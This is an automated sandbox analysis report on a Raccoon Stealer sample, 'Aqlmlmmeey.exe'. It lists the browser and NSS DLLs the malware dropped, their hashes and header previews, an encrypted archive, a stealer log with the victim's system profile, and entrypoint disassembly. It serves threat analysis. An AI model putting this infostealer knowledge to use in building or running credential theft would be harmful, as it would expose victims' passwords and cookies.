SHA-256:	2B128B3702F8509F35CAD0D657C9A00F0487B93D70336DF229F8588FBA6BA926
SHA-512:	A6123BA3BCF9DE6AA8CE09F2F84D6D3C79B0586F9E2FD0C8A6C3246A91098099B64EDC2F5D7E7007D24048F10AE9FC30CCF7779171F3FD03919807EE6AF76809
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q...?S..?S..?S..S..?S\|.>R..?S;..S..?S\|.<R..?S\|.:R..?S\|.;R..?S..>R..?S..>S..?Sn.;R.?Sn.?R..?Sn..S..?Sn.=R..?SRich..?S........................PE..L....@.\.........."!.........f...... ........................................0............@.............................................x.................... ......p...T..............................@...............\............................text...:........................... ..`.rdata...@.......B..................@..@.data...l...........................@....rsrc...x...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20432
Entropy (8bit):	6.337521751154348
Encrypted:	false
SSDEEP:	384:YxfML3ALxK0AZEuzOJKRsIFYvDG8A3OPLonw4S:0fMmxFyO4RpGDG8MjS
MD5:	4FE544DFC7CDAA026DA6EDA09CAD66C4
SHA1:	85D21E5F5F72A4808F02F4EA14AA65154E52CE99
SHA-256:	3AABBE0AA86CE8A91E5C49B7DE577AF73B9889D7F03AF919F17F3F315A879B0F
SHA-512:	5C78C5482E589AF7D609318A6705824FD504136AEAAC63F373E913DA85FA03AF868669534496217B05D74364A165D7E08899437FCC0E3017F02D94858BA814BB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9..j..j..j...j..j^..k..j^..k..j^..k..j^..k..j...k..j..j..jL..k..jL..k..jL.bj..jL..k..jRich..j........................PE..L....<.\.........."!................Y........0...............................p......r.....@..........................5.......6.......P..x............2.......`..x....0..T...........................(1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc...x....P.......,..............@..@.reloc..x....`.......0..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	55760
Entropy (8bit):	6.738700405402967
Encrypted:	false
SSDEEP:	1536:LxsBS3Q6j+37mWT7DT/GszGrn7iBCmjFCOu:LxTBcmWT7X/Gszen7icmjFtu
MD5:	56E982D4C380C9CD24852564A8C02C3E
SHA1:	F9031327208176059CD03F53C8C5934C1050897F
SHA-256:	7F93B70257D966EA1C1A6038892B19E8360AADD8E8AE58E75EBB0697B9EA8786
SHA-512:	92ADC4C905A800F8AB5C972B166099382F930435694D5F9A45D1FDE3FEF94FAC57FD8FAFF56FFCFCFDBC61A43E6395561B882966BE0C814ECC7E672C67E6765A
Malicious:	false
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...........l...l...l.......l..~....l..9...l..~....l..~....l..~....l.......l..l....l...l...l...l...l..l....l..l....l..l....l..l..l..l....l..Rich.l..........................PE..L...z@.\.........."!.........2......................................................t.....@...........................................x...............................T...............................@............................................text.............................. ..`.rdata..>...........................@..@.data...............................@....rodata.8...........................@..@.rsrc...x...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22480
Entropy (8bit):	6.528357540966124
Encrypted:	false
SSDEEP:	384:INZ9mLVDAffJJKAtn0mLAb8X3FbvDG8A3OPLonzvGb:4mx+fXvn4YFrDG8MKb
MD5:	96B879B611B2BBEE85DF18884039C2B8
SHA1:	00794796ACAC3899C1FB9ABBF123FEF3CC641624
SHA-256:	7B9FC6BE34F43D39471C2ADD872D5B4350853DB11CC66A323EF9E0C231542FB9
SHA-512:	DF8F1AA0384A5682AE47F212F3153D26EAFBBF12A8C996428C3366BEBE16850D0BDA453EC5F4806E6A62C36D312D37B8BBAFF549968909415670C9C61A6EC49A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N{.N{.N{.6..N{.F,z.N{.F,x.N{.F,~.N{.F,..N{..z.N{.T-z.N{.Nz..N{.T-~.N{.T-{.N{.T-..N{.T-y.N{.Rich.N{.........................PE..L...aA.\.........."!.........(............... ...............................p......~.....@..........................%..........d....P..x............:.......`.......!..T............................"..@............ ...............................text... ........................... ..`.rdata....... ......................@..@.data........@.......2..............@....rsrc...x....P.......4..............@..@.reloc.......`.......8..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83408
Entropy (8bit):	6.436278889454398
Encrypted:	false
SSDEEP:	1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
MD5:	385A92719CC3A215007B83947922B9B5
SHA1:	38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
SHA-256:	06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
SHA-512:	9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83408
Entropy (8bit):	6.436278889454398
Encrypted:	false
SSDEEP:	1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
MD5:	385A92719CC3A215007B83947922B9B5
SHA1:	38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
SHA-256:	06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
SHA-512:	9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	137168
Entropy (8bit):	6.784614237836286
Encrypted:	false
SSDEEP:	3072:Z6s2DIGLXlNJJcPoN0j/kVqhp1qt/TXTv7q1D2JJJvPhrSeXZ5dR:MszGLXlNrE/kVqhp12/TXTjSD2JJJvPt
MD5:	EAE9273F8CDCF9321C6C37C244773139
SHA1:	8378E2A2F3635574C106EEA8419B5EB00B8489B0
SHA-256:	A0C6630D4012AE0311FF40F4F06911BCF1A23F7A4762CE219B8DFFA012D188CC
SHA-512:	06E43E484A89CEA9BA9B9519828D38E7C64B040F44CDAEB321CBDA574E7551B11FEA139CE3538F387A0A39A3D8C4CBA7F4CF03E4A3C98DB85F8121C2212A9097
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...{>.\.........."!.....z...................................................@......j.....@A........................@...t.......,.... ..x....................0..l.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..l....0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\msvcp140.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1245136
Entropy (8bit):	6.766715162066988
Encrypted:	false
SSDEEP:	24576:ido5Js2a56/+VwJebKj5KYFsRjzx5ZxKV6D1Z4Go/LCiytoxq2Zwn5hCM4MSRdY8:Q2aY4w6aozx5ZWMM7yew8MSRK1y
MD5:	02CC7B8EE30056D5912DE54F1BDFC219
SHA1:	A6923DA95705FB81E368AE48F93D28522EF552FB
SHA-256:	1989526553FD1E1E49B0FEA8036822CA062D3D39C4CAB4A37846173D0F1753D5
SHA-512:	0D5DFCF4FB19B27246FA799E339D67CD1B494427783F379267FB2D10D615FFB734711BAB2C515062C078F990A44A36F2D15859B1DACD4143DCC35B5C0CEE0EF5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.4.'.Z.'.Z.'.Z.....3.Z...[.%.Z.B..#.Z...Y.*.Z..._.-.Z...^.,.Z...[./.Z..[.$.Z.'.[...Z..^.-.Z..Z.&.Z...&.Z..X.&.Z.Rich'.Z.........................PE..L....@.\.........."!.........................................................@......Q.....@................................x=..T.......p........................\|......T...........................h...@............................................text............................... ..`.rdata...Q.......R..................@..@.data...tG...`..."...>..............@....rsrc...p............`..............@..@.reloc...\|.......~...d..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	336336
Entropy (8bit):	7.0315399874711995
Encrypted:	false
SSDEEP:	6144:8bndzEL04gF85K9autIMyEhZ/V3psPyHa9tBe1:8bndzEL04pnutIMyAp2z9tBe1
MD5:	BDAF9852F588C86B055C846B53D4C144
SHA1:	03B739430CF9EADE21C977B5B416C4DD94528C3B
SHA-256:	2481DA1C459A2429A933D19AD6AE514BD2AE59818246DDB67B0EF44146CED3D8
SHA-512:	19D9A952A3DF5703542FA52A5A780C2E04D6A132059F30715954EAC40CD1C3F3B119A29736D4A911BE85086AFE08A54A7482FA409DFD882BAC39037F9EECD7EF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pi.Pi.Pi.(..Pi.F2h.Pi.F2j.Pi.F2l.Pi.F2m.Pi.0h.Pi.T3h.Pi.Ph.Pi.T3m.Pi.T3i.Pi.T3..Pi.T3k.Pi.Rich.Pi.........PE..L....@.\.........."!.........`......q........................................@...........@.............................P.......d.......x.......................t)..p...T..............................@............................................text.............................. ..`.rdata..>...........................@..@.data....N.......L..................@....rsrc...x...........................@..@.reloc..t).......*..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92624
Entropy (8bit):	6.639527605275762
Encrypted:	false
SSDEEP:	1536:YvNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41Pc:+NGVOiBZbcGmxXMcBqmzoCUZoZebHPAT
MD5:	94919DEA9C745FBB01653F3FDAE59C23
SHA1:	99181610D8C9255947D7B2134CDB4825BD5A25FF
SHA-256:	BE3987A6CD970FF570A916774EB3D4E1EDCE675E70EDAC1BAF5E2104685610B0
SHA-512:	1A3BB3ECADD76678A65B7CB4EBE3460D0502B4CA96B1399F9E56854141C8463A0CFCFFEDF1DEFFB7470DDFBAC3B608DC10514ECA196D19B70803FBB02188E15E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L....@.\.........."!.........0...............0......................................*q....@......................... ?......(@.......`..x............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..D....0... ..................@..@.data........P.......>..............@....rsrc...x....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\pB4pD1lB4sD3.zip Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	2828315
Entropy (8bit):	7.998625956067725
Encrypted:	true
SSDEEP:	49152:tiGLaX5/cgbRETlc0EqgSVAx07XZiEi4qiefeEJGt5ygL0+6/qax:t9OX9alwJSVP1fnefekGt5CP
MD5:	1117CD347D09C43C1F2079439056ADA3
SHA1:	93C2CE5FC4924314318554E131CFBCD119F01AB6
SHA-256:	4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
SHA-512:	FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
Malicious:	false
Preview:	PK.........znN<..{r....i......nssdbm3.dll...\|...8...N..Y..6.$J.....$1...D .a.....jL.V..C...N.;....}./............$...Z,T.R.qc...Ec.=................;..{..s....p.`..A.?M.....W!.....a..?N...~e.A..W.o.....[.}...,...;.+\....Jw.\|...k.......<yR.^.E.o.nxs.c...=V....,..F....cu.....w.O..[..u.{..<.w....7P...{..K~..E..w...c...z^..[Z....6.G.V.2..+.n4......1M.......w{f..nJL..{. d......M..+.. ......./.)..$X!......L..K.`.M...w.I..LA8r.IX...r...87..}........<.].r.....TWm......b6/._....a..W.lB...3.n.._...j....o.Mz.._Q........8....K............gr..L..H...v....6[...4I...{.1g..<..>M..$G.&Y........-.....O..9\...,t..W.m.X ..Y.3....S<#}.".>.0RBg,...lh.s..o.....r.p8...)..3..K.v....ds.n3.+]....+....krMu._.Y\..../8T......&.BC.".u..;..e.k u$......~`.{.!.M...\W.Y.37+nQ.Z.*...3\G..5d....Z.hVL..Z.\|k.5...XF.Y..lVVW..C..\|.....b..\.Z...m. ..0...P.F8{].U.p..RW,n...MM.....s..._@..>Q.. ...N.>.T?WM....)9B.............mVW.......b.6{..\|!......O....M....>.>.$\.%..L.zF.l...3

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24016
Entropy (8bit):	6.532540890393685
Encrypted:	false
SSDEEP:	384:TQJMOeAdiNcNUO3qgpw6MnTmJk0llEEHAnDl3vDG8A3OPLondJJs2z:KMaNqb6MTmVllEK2p/DG8MlsQ
MD5:	6099C438F37E949C4C541E61E88098B7
SHA1:	0AD03A6F626385554A885BD742DFE5B59BC944F5
SHA-256:	46B005817868F91CF60BAA052EE96436FC6194CE9A61E93260DF5037CDFA37A5
SHA-512:	97916C72BF75C11754523E2BC14318A1EA310189807AC8059C5F3DC1049321E5A3F82CDDD62944EA6688F046EE02FF10B7DDF8876556D1690729E5029EA414A9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:`wq[.$q[.$q[.$x#.$s[.$.9.%s[.$.9.%p[.$.9.%{[.$.9.%z[.$S;.%s[.$.8.%t[.$q[.$=[.$.8.%t[.$.8.%p[.$.8.$p[.$.8.%p[.$Richq[.$........PE..L....@.\.........."!..... ... .......%.......0...............................p......./....@..........................5......p7..x....P..x............@.......`..$...`1..T............................1..@............0..,............................text...2........ .................. ..`.rdata.......0.......$..............@..@.data...4....@.......4..............@....rsrc...x....P.......8..............@..@.reloc..$....`.......<..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	16336
Entropy (8bit):	6.437762295038996
Encrypted:	false
SSDEEP:	192:aPgr1ZCb2vGJ7b20qKvFej7x0KDWpH3vUA397Ae+PjPonZwC7Qm:aYpZPGJP209F4vDG8A3OPLonZwC7X
MD5:	F3A355D0B1AB3CC8EFFCC90C8A7B7538
SHA1:	1191F64692A89A04D060279C25E4779C05D8C375
SHA-256:	7A589024CF0EEB59F020F91BE4FE7EE0C90694C92918A467D5277574AC25A5A2
SHA-512:	6A9DB921156828BCE7063E5CDC5EC5886A13BD550BA8ED88C99FA6E7869ECFBA0D0B7953A4932EB8381243CD95E87C98B91C90D4EB2B0ACD7EE87BE114A91A9E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s6.7W..7W..7W..>/..5W...5..5W...5..6W...5..>W...5..<W...7..4W..7W..*W...4..6W...4`.6W...4..6W..Rich7W..................PE..L....B.\.........."!......................... ...............................`.......r....@..................................$..P....@..x............".......P.. .... ..T............................ ..@............ ..h............................text...P........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...x....@......................@..@.reloc.. ....P....... ..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.54005414297208
Encrypted:	false
SSDEEP:	3072:8Af6suip+I7FEk/oJz69sFaXeu9CoT2nIVFetBW3D2xkEMk:B6POsF4CoT2OeYMzMk
MD5:	4E8DF049F3459FA94AB6AD387F3561AC
SHA1:	06ED392BC29AD9D5FC05EE254C2625FD65925114
SHA-256:	25A4DAE37120426AB060EBB39B7030B3E7C1093CC34B0877F223B6843B651871
SHA-512:	3DD4A86F83465989B2B30C240A7307EDD1B92D5C1D5C57D47EFF287DC9DAA7BACE157017908D82E00BE90F08FF5BADB68019FFC9D881440229DCEA5038F61CD6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....@.\.........."!.........b...............................................P.......\|....@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ucrtbase.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142072
Entropy (8bit):	6.809041027525523
Encrypted:	false
SSDEEP:	24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
MD5:	D6326267AE77655F312D2287903DB4D3
SHA1:	1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
SHA-256:	0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
SHA-512:	11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\vcruntime140.dll Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\yH9tY9hO9gL5 Download File
Process:	C:\Users\user\Desktop\Aqlmlmmeey.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	1083
Entropy (8bit):	5.291815191087187
Encrypted:	false
SSDEEP:	24:m9S+GH/v3eLy53Net5I8rBqhKQa7dCGik/R8RA2Tvqzh:eS333n3NetBBg0CGik/R0A+0h
MD5:	E5E8D43ACEA45ACB24D3EBEFB2F28E20
SHA1:	94949E2F04B298E98D7D639C763905E5FB144F22
SHA-256:	B51F5324409E6B32363663EA60E97BD3C5C03FE71D735587D7873D1574DFD58D
SHA-512:	625B3D7972AE9C4AD4B7BD0721335C5D398A55FE09942E2651B10A06FE49FE2109F11461C9EC3C5DB8D311EBF8710494EA34612D1B6123F0588B4A410D66180D
Malicious:	false
Preview:	RACCOON STEALER \| 1.8.1...Build compile date: Wed Sep 8 00:01:38 2021...Launched at: 2021.09.28 - 16:13:40 GMT...Bot_ID: D06ED635-68F6-4E9A-955C-4899F5F57B9A_user...Running on a desktop......-------------...... - Cookies: 1... - Passwords: 0... - Files: 0......System Information:... - System Language: English... - System TimeZone: -8 hrs... - IP: 84.17.52.39... - Location: 47.431702, 8.575900 \| Zurich, Zurich, Switzerland (8152)... - ComputerName: 066656... - Username: user... - Windows version: NT 10.0... - Product name: Windows 10 Pro... - System arch: x64... - CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores)... - RAM: 8191 MB (5378 MB used)... - Screen resolution: 1280x1024... - Display devices:....0) Microsoft Basic Display Adapter......-------------......Installed Apps: ....Adobe Acrobat Reader DC (19.012.20035)....Google Chrome (85.0.4183.121)....Google Update Helper (1.3.35.451)....Java 8 Update 211 (8.0.2110.12)....Java Auto Updater (2.8.211.12)....Upd

\Device\Null Download File
Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.300553674183507
Encrypted:	false
SSDEEP:	3:hYFEHgARcWmFsFJQZtctFst3g4t32vov:hYFE1mFSQZi3MXt3X
MD5:	F74899957624A2837F2F86E8E62E92D4
SHA1:	1FCDAC5DEC5B0B1E00CF0247DA2A5F18566F1431
SHA-256:	507992A303C447D1D40D36E2E5163A237077B94F23A7089AC90A2F08682AE9BC
SHA-512:	E3FD14728633614B6552A75C15079AC8B04C0E8B3F49535B522C73312B1C812E30A934099AB18B507A0B4878068987D5545E90FA3747F7E7B10360EE324DB435
Malicious:	false
Preview:	..Waiting for 10 seconds, press CTRL+C to quit ..... 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.1568987103396156
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Aqlmlmmeey.exe
File size:	553984
MD5:	c1258ce5cdc59be3cf83f8de7a42e899
SHA1:	7097454adeef597a9f06839b68be559827d1ed42
SHA256:	51883d0e9ac65bb1850ce0f0a668df2a03e16bb9500be5a6ca54f8ff02154506
SHA512:	3c6d59be6cbbf071cd78251ce89eacba790878b6a0cdf254a4cf91065cd413f8f6aca53ad6fcd4aa53ddc00905f4b3b8b4e6c65f8fb29715578850b5e739c9e2
SSDEEP:	12288:JIfJlGJU+v7zpNTCZDJ17znqpRtq7Mad:GvGJPfTK+Rt8MU
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........w...$...$...$..k$...$..^$...$..j$...$..S$...$...$...$..o$...$..Z$...$..]$...$Rich...$........PE..L....^P_...................

File Icon


Icon Hash:	aedaae9ee6a68aa4

Static PE Info

General
Entrypoint:	0x4022b0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x5F505E00 [Thu Sep 3 03:07:44 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	b3447c394869d3e708c4373cd10a2b6b

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007F1034AD2D1Bh
call 00007F1034AC8CF6h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 00423510h
push 00408EA0h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF98h
push ebx
push esi
push edi
mov eax, dword ptr [00425918h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0041C0F0h]
cmp dword ptr [02BB9BA0h], 00000000h
jne 00007F1034AC8CF0h
push 00000000h
push 00000000h
push 00000001h
push 00000000h
call dword ptr [0041C0B4h]
call 00007F1034AC8E73h
mov dword ptr [ebp-6Ch], eax
call 00007F1034AD371Bh
test eax, eax
jne 00007F1034AC8CECh
push 0000001Ch
call 00007F1034AC8E30h
add esp, 04h
call 00007F1034ACAAF8h
test eax, eax
jne 00007F1034AC8CECh
push 00000010h
call 00007F1034AC8E1Dh
add esp, 04h
push 00000001h
call 00007F1034ACF1F3h
add esp, 04h
call 00007F1034AD368Bh
mov dword ptr [ebp-04h], 00000000h
call 00007F1034AD273Fh
test eax, eax

Rich Headers

Programming Language:

[LNK] VS2010 build 30319
[ASM] VS2010 build 30319
